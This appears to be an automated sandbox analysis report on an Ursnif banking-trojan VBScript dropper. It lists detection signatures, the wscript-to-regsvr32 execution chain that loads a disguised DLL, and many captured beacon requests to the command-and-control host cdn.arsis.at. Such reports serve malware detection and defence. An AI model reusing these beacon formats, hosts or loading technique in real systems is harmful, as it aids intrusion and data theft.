Loading ...

Play interactive tourEdit tour

Analysis Report description#_18130.vbs

Overview

General Information

Sample Name:description#_18130.vbs
MD5:0eae2e553630b7893aca883afce4c359
SHA1:d361bed5baf23bee3642ebe446bc1b3c34940e06
SHA256:08f605fcab58e08fefdb8f890af1e4d7f48fd0e8d71f0c1f817139461573f99d

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4772 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_18130.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 4936 cmdline: regsvr32 C:\Users\user\AppData\Local\Temp\swatch.c MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4920 cmdline: C:\Users\user\AppData\Local\Temp\swatch.c MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 1796 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1796 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3084 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3084 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3440 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1176 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3440 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5068 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5096 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5068 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\swatch.c , CommandLine: C:\Users\user\AppData\Local\Temp\swatch.c , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 C:\Users\user\AppData\Local\Temp\swatch.c , ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 4936, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\swatch.c , ProcessId: 4920

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 10%Perma Link
            Source: http://cdn.arsis.at/Virustotal: Detection: 10%Perma Link
            Source: https://2no.co/Virustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\swatch.cVirustotal: Detection: 28%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\swatch.cReversingLabs: Detection: 26%
            Multi AV Scanner detection for submitted fileShow sources
            Source: description#_18130.vbsVirustotal: Detection: 28%Perma Link
            Source: description#_18130.vbsReversingLabs: Detection: 22%

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04D09673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,5_2_04D09673
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/pC0zXVG6W77gclKbNA/MIJtIFx_2/F4N_2BTqGxbLsz_2Ff0w/D0i1Rl7WXPftznBr2ij/dNRHLBKwCLjbuVIjMwgUxS/GaL5QXLz_2FVq/ZxaDx75_/2Bbj17AhdPa2puM7c87SLH2/MfwUubMbrj/dJHAdmR_2BhQMoP9f/GvtPMSmxLPES/g6Y9kQaHjk4/hZZ5pcK3fv4eYU/T57_2FN9idN3sslez69_2/BeWERE7y56bNqclY/VByqc0C7XI_2BnN/ZudSPGcv3dfv_2FDTY/ak3RrF_0A/_0D0_2BnGwS_2B8S6VZe/a56mGC2lvcpfx91vtbn/r_2BC5WuK1Ssc3YN_2FuRn/vpZgUKTmud5c0oRYe/t HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/1sOKucZ9f/S3lEWQXnKWrSYbQGOM9n/B7HD0xxaBY2CFd4J_2F/I6_2FN93r4HzePpUJnBJoc/E_2FNUaJXcMff/E8pydIbk/JU1zAfp4rzayQ1uEmmSh5fA/iw55KjqoRG/T_2B8rTsyv3OjijcX/_2BLInPpv9Kg/xz1MC0BEgFf/9_2BB7C8Xy_2Fn/twV_2Bma67mOTG_2BGWD0/jcN87VN_2BpPPSkk/xe5rPeti6MhAtGd/D8UF1SccjxgvT7SGwH/8XceBzYwJ/_2BCsuFH_2FCcfDHE5x_/0A_0DFI9AntgtXWANW5/MdtRFCoFHi18LPgIXorYHN/l7tow9cX6apoV/iUeCr3xyKeJRSF/Z8A47 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/kKGfXI0dKlfZdybn_/2BiOK7jZoik6/QNo9im7kNsa/dSL6IBy9HyzJsL/eURt9kBi3_2FMjT4wWFI4/c1EzNea5BzyD7e3C/hq98OZvKJwuKAes/j0_2BuUG4XrRanLJap/PP1JhXPji/j2qpgBF66Dc28_2FwN1b/5YEjsBOcPzjuz7tFDQd/ieqlcrTFxVOTGqirDm7bCv/rHNkljFIzwdVr/vo2Fg4g9/_2FADRp6_2BKGP0WiXknGYn/5Y_2FQSoGl/etBYU00g421d83_2B/DxW_0A_0DV06/H7IcZOhhkbR/u1dE0W_2FKzoyd/c9qhFqhDOyYIrFAbOQ/exO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/gsxV7WZG_2BPGAJr6d3vbaL/ja6OlJTt2K/SOGbxRmnM_2BXi4eJ/nanYicqPMgdQ/KkfmjTIR4Yy/4jQjZ_2B9aDy6P/n6TKsgm_2BglLfYavFmKv/sHBlYmo6cuSdkZI8/Lc9YzhCc0diZk_2/B_2F6DrKzrg7kq3Mnt/DWgoK4WJ8/mxWm0O9Pw4l1D_2Fp1Ff/HZkPyfTytcRWcVNKS2B/UTzIXmVY_2FgjX9YgVrnO_/2BCUGmxPKWOTh/aRbkqAJq/599Rx8CSw4voqw2QtkAJ4O_/0A_0Dk_2B1/FpnA0eBeR0bjnXnnq/W5DTAMjN6SgL/XJmE_2F80jAy/fTeHb HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/TAoKB2tfToO_2F/qfPu5uBg_2BHLxQF8SeMf/nL_2BoIeEodJM4M5/VRKTuGbLhKy6dWe/83YzCWMtyQmnFotTzi/cOuf4GC7s/xDBIMqypDry_2FV6AS8D/BVwjaKh0S5tVKL2UgUR/v_2FWi31Y6y3h85ms4K164/yOIScEQ_2B5sP/EplB_2BU/9anE35_2BGhHpzucei8akLw/Ww8Ba3DzHn/39_2F779XRaZC5OIX/j9okLg8Kp5_2/FU9cGGJJVIy/XmMvZiDOUfNgum/geuu6NzfVK_0A_0D5DOpA/xmu_2BAHgOOrIIuS/XtiOGkX_2FEXBO5/p2Nmt_2Fv2sNmoHKF_/2FE4L0ev8bfQthpgz/hDqHW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/E2OcPKjW0Zf1x81J1uu_2/BbLfQsWv4_2BdH0D/BO8X_2F2gU58Pf_/2FE8pB3FcarsbGaumT/mf_2FGcoL/mzhk5wwHqPumuD9PWH3p/AAzj8SQ9LCOcln4P_2F/K49iM1wXhs56xiu54sBSXa/YdL7JDyK6qbhd/i21cO3Fy/9YvoSEdF8crhsyIUGoSLX6m/05o7w7DY3N/KQvoF0_2FEvB8_2Fz/1tutsMIH6qTv/njwS_2BEC45/qjzLXZJzXY0xGJ/b77SqirMlqewYxfJt9P9m/_2B_0A_0DA73x8_2/FkQkChtK7VW8b4A/0N7rfbWf9M8Yo_2Bv6/eEHvSHo8M/6SAMB7mwEz_2FC3WKGTz/3YdKe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/1IfunfKjMlcxlC4FuLyBvyw/2ekUixTz4h/soo3z4zdyGxudH8ZG/Ceva8plaGMpY/yf4c03tXpxt/nSszS8JvQKC_2B/NQfSuaH3tLsokVcn_2FST/1_2B7NYA_2BETAeE/jK_2F_2FRO1C96J/RlEJHKs0nF_2BSc_2B/zA8RX0_2B/xHDlNdvNxGWiDQMooR1c/Bz0_2B_2FyYnVjkhGr_/2B0K3jOxW7HBRdqe_2FxzR/N4V1bg9QzqzP5/jDMksVD9/HFlUt0yLwMjx9objGr3rGuP/iQ3_2FISh_/0A_0D6pqZjSdyM8DG/4ao13sjDga2G/BV37VcW4kPb/Zivl_2FHTdQ7j_/2Bo6TG9Fk/36GJVUTYKZLX/VZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/mhGxvxEynHbWXGIwY/MVWbs53ujYmg/zWe_2BQmEuQ/FZzmgUlCoPDQMD/990ZnHGiAyDtIB44dSDoZ/ttaRtQz3eK_2BPCT/ylRF7Z4x3lo25I_/2BdXcDK86OTPmWvYBI/BmFIZfmNt/bE_2Fg2ZidytMTl2fX_2/F3sb_2BwX9Y2cBkk4_2/FhiDPGJthsSPfMv8o25osJ/q2zmvT0_2BHwU/SKj3v_2F/cEmzKD1NCpyrQvOEa3_2BN5/wYIWKlXz01/FRmIdculh3nSOzglC/5zIq_2BJU_0A/_0Db_2FEcZn/hZClZ5C8WYP6kw/DdMxxK1YwYAduhKj_2FPX/0IVTUs67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/LnPg_2BrEa/z2nquAc_2FGTYFHD_/2FKCQ6p75LKF/ebSYON7pKiM/80dhYant4sNDGA/mvhSvlgCHOYunZ8_2BB6h/2pFqIkCjBWNRy1yr/mCKtOVVBvnOCLfv/pY9N5BISjH6OUGXtxT/RSSLhScPo/HmQ5WaROwK0kYGNe9cTf/6RSzC1oDxIAHTQKX8vE/yGoQtrtdr3g9SBBQjuKRPX/d5qX6tkfD3sSa/T32dbEod/Rg9bUSWqUnNcW4GxdtXUyGD/URlub8cly5/cb_0A_0D4bYZmhgCx/hrxFb56CYfAj/27518p9RGGx/XZ7Tag6B53PkRI/9nycFbN76jC95TK_2FAli/Y4_2F HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/RON8zX9sfnbvHN_2/BEVk5eoazoRHosN/Y1HS7JsiAFBwIKKG9u/rIRCzyjel/H7m_2B9IUdNPezJYgULa/FPeFY9E8EaOz_2F_2FX/7ZGzchUH3oeIgb5rftYRjW/bGAb_2BDfm_2F/i7Ov1xb4/kUCcNO4FCDlE2oFlBeHsMhr/Fr7FwT3qJV/4g0wINwfmxibNwsJu/pnAo2Wj2twxm/Zg7cXaPpc6O/i8usncs99_2BYv/0j5ZJX8xTbk2b6KBruuFa/vVwgNjxUKOcpVJGm/mo_0A_0D8_2BbnT/pzJVElJiEIPGnbLMEF/diWIc99JQ/76YtStJ6Yqm/aMpK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/75rgXJFZU4DHj/EfI_2FmJ/QvJhXdnFffGIsv3T_2Ft9et/4HtJsnEwYF/oHjLF92c3WazlvR5U/EkMqVSb1uiqY/XzAQPw7jTKp/0PRIlVfRbFOlce/htj4Nj3hkXM5ePXUNIED_/2BBGpxXF5swI2DXq/NOoJbAIl25nKomt/0OHvktI6mHXIL7wenM/T3PXwHAxT/SxNkGrhv3yMmHFr9T9N6/6GeLoJYDUuKG8oM8kiH/Hq8XCGNgI3Evc959iXtVrs/EDqIosBg2C_0A/_0DzeZbA/20Bm7z_2FzbC6vw7vSnnlUX/6xkQR2RFg0Z/8vFAK0jQV/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/sLGTTfdyfg1EumB/sWYc24MLd3oYemjied/rgPwOvJ3n/Doju0LMwF5tZVlw8EeTF/_2FGL3Vd3kpFlzGlU50/9sOUBIyzE1ABvRENqn0iNG/A1lWtjfxipj8g/T1Q_2FUr/I5XJVScI_2BOWJslKArJ4bh/uG7FP35t7v/FJJ_2FBTWE8fsiM53/FstLkc6sU9jb/FvW5opE8haH/pPV8Z75phIk77x/JRsLLYLSL3_2Fj4HcsXwt/XcT5MFLokazbKKYE/L3GZD8gpJvv38a_/0A_0Dxp9HZJ8ThCxJ0/XyvXRYYgY/lFBy9dJSF8PU0yLSupZB/gsOKT_2BxYqzdPQv2G7/vMDP2LY_/2Fd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/1fVFUry7fK3k_2Fsem/_2FOUFeKZ/qW9ViIP2qDL8RwHXTeDg/RfhdBej9BsYKij5dOJ1/feXOffs9j_2Fb6Xcv_2BEo/DHUNFaLAl_2Fb/Xh_2FvX8/XSnKD2718i4nNFI6khzK4p6/ZVQCtTBW46/BXB9T23egG7U6yauJ/mqNcqmOOVFWB/pPLTqQvtO4b/zuRDa_2BVndlba/P0YpTL58BYYszqK7CAtoS/8Rqw_2Bt1YUB3YB8/V33talEwwfGTyi_/2FkNPvRBpPfAxwW3TN/Z_2FHc_0A/_0DdQwcf6wPJvMX0Z19L/v_2Bsi75idymnAJd_2B/XCpuLFIuaYYEV_2F/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/tQqAmL4f2ZZ59R/kMowXFfwFUiUuZjhMGbeh/xmgF1pEKgxJgpyK8/ia5Cyfi25CNoAi7/iEASUwSGdAmiLA0kUf/FEDecjA7M/vyrzP016eqiuuVOU_2B5/APshNKG5HgYgjkODB3q/mhAyIAyIASYFF0zhNeGDZs/84PMnxfd2ZAxW/FK1bQUmU/9efnSBCm4D5LZ88m1RYUq81/qVh1xtYFpv/wzcWFP5_2FVoRV_2B/QqrrZ2UHJYwS/9UpW5Nre_2F/oDSgotULhC0W_0/A_0DVg_2FfLx6izbh5KBl/jc0T4MLpE_2FUQqU/PerwAIslQ2g2bMC/Kl3T2ECAYNqTQEVKCO/9bKZsk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/PU99_2BfnVmDRWOrjaS/zDpYmFW2xeWBjTANqwv4D_/2FcLuSsWFYBD5/zrSpj6IH/HoGjLlXXiDXw6Yv11OuAFog/l4abM3hc1H/W4riB6hOF_2BFy21J/8_2BF2ibWiz8/x5VR7L_2Fwk/Jl8ERHdfoCN1l1/59n7qXqPKSoTB9uCHidQy/sPurfE6agsiBnhbD/1XsHdHvmRC4UfhS/eJoQEH_2B_2Frga4ca/qSS_2BIjh/1ammiwOVxQBkRk_2Fujx/F8GysBmyVF4TEiKH_2F/XulaO_0A_0DhPedcl4mqb3/86Rosaz51Dr8q/qhZHprTN/DrG2fIAUrHUc_2FunaNg0N6/eFfd_2F7_2FxlfzVSV/0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/RGRWfwwp00swHSgZQp/ZuihFyBs4/QRgx4oIRESCFojESKI5v/Mh3nmzUFDFmbYgxTVn_/2FtQUWjNQyPV_2FITnnUjf/Ndcn89s4bxs_2/BN89yby_/2Fe0IR3rpdy_2FQwaDR3J_2/F4jyaEkDBs/I6gxSwDJ0FE4ME7A_/2Fzg1qC52Q1w/FJPXHNwqqXR/Tai92dXRVHrJNT/eq_2FD2DDi_2BLaZglfAb/CIi7cm83MlLoUSn0/VspuaM_2FInhYC6/uVR4fsaOgDPU5kzxuN/IX23Fi_0A/_0DeeUNSCF2ij000BZhg/SAHclzug9_2BVH1GcBj/1RbhDsQWAp84uzycdjbg6Q/Lh0ubuyBR/w2f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/Jolr593tt/qqY5EhoOV_2B_2BhjkvA/wb8t8txJG8lSVzWExEK/sS2jDcSkqp5VFchA_2FdYj/_2FgAs5NboaZc/_2BrBzBs/S5EopaJ3xtoaMyFL5ggyQxF/SbcW8cScm9/5NQlkph48H8PojmWp/sGsmRw3lLAfE/c8FR8HFkynz/DzRGQgd5JAhbQ6/9MZ7FkgoKoh_2B5wXGtP7/G2j_2BtY6qsg9iCN/lAbNTK5ZkPO_2Bf/qYmoA8UPuvTYmH8KI_/2BXuGvJM_/2Bng1VXFaX9Qatt_0A_0/D30BTZihiIo1uKY9kvl/Iw_2F0C7MXoH9FA9_2FM6t/uOqVaKs7xJcm5/IJpV9JcTu2G6T/W7Fzyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/sk44oGUEc_2B7XsaRsa9/958Fcv54oO7msz1mwo6/Z4h7bfYSW1tFdsD1oGfV7P/DS_2BvMXtwfpQ/z9slQeQ8/_2FQr0aDBjxX1vqtNwafWU8/_2FRkrTmli/SOVk_2BCPbpP3eCjJ/_2B7Dsf_2F5g/niRkjKgVsV6/YQ8uErLTVc2weF/_2B0mkXEmAIZFS_2BkgUC/Wd71OoKEqgR5vXus/zRYQPptHvA2bk4l/81iYBwHd317WuUEO8G/XPCadLiK5/AbJU8iAmRidV2wijJWAN/vw_0A_0DIgitt1UNn_2/FRhQhtrWQmcVpYpNyttNXg/IIANWk7EGsU5k/nDMNe_2F/kPEYiQjLwhI3m/Yjzxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/jMU3QCcwAcpbxK6OnVG/zQQSQnMqh4c48J0XzHDL_2/F6fwPyE5zlfb5/0pNZqJc_/2BlGYux7qTM6LFcHjnnB2oG/de2Oukd8AA/uN94CxxnI5U841B8d/bjzZUkRhIizl/eHUqFSo0frO/3Bf3Ci7olKPS_2/BOh3QFU5RTNFvN4D7OE2E/jyah7Ng9f2iGoS_2/Fxphfnd60RQvD7H/lll9RsXbK11Jyce6ou/pVwbdMPdI/kr0r7zLyrBNPQQyIkSOt/yrXmk2CepiiJ_0A_0Dp/lP_2BywPpn65MWqFf5x_2F/zmDEkX4wraXO4/XmZWa6oA/HhqgqtOIVcqhundvdCDu0rX/uPh1a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:77.0) Gecko/20100101 Firefox/77.0Host: cdn.arsis.at
            Source: msapplication.xml1.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x817af218,0x01d64e81</date><accdate>0x817af218,0x01d64e81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x817af218,0x01d64e81</date><accdate>0x817af218,0x01d64e81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x817ff031,0x01d64e81</date><accdate>0x817ff031,0x01d64e81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x817ff031,0x01d64e81</date><accdate>0x81827882,0x01d64e81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81850119,0x01d64e81</date><accdate>0x81850119,0x01d64e81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81850119,0x01d64e81</date><accdate>0x81850119,0x01d64e81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: 2no.co
